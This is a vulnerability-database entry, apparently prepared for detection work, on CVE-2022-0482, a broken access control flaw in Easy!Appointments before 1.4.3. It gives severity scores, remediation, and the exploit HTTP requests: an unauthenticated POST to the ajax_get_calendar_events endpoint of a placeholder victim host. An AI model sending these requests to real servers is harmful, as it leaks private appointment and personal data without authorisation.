🔙 목록으로 돌아가기

CVE-2022-0482: Easy!Appointments <1.4.3 - Broken Access Control

TitleEasy!Appointments <1.4.3 - Broken Access Control
Authorfrancescocarlucci,opencirt
SeverityCritical
ImpactAn attacker can exploit this vulnerability to gain unauthorized access to sensitive data or perform unauthorized actions.
RemediationUpgrade Easy!Appointments to version 1.4.4 or above to fix the Broken Access Control vulnerability.
CVSS Score9.1
EPSS Score0.93282
CVE IDCVE-2022-0482
CWE IDCWE-359,CWE-863
Tags cve cve2022 easyappointments huntr wordpress vkev vuln

🔍 Vulnerability Description

Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments.

🌐 HTTP Request

GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Encoding: gzip
POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15
Connection: close
Content-Length: 56
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip

csrfToken=6oSnmv&startDate=2022-01-01&endDate=2022-01-01

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0482.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-0482.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A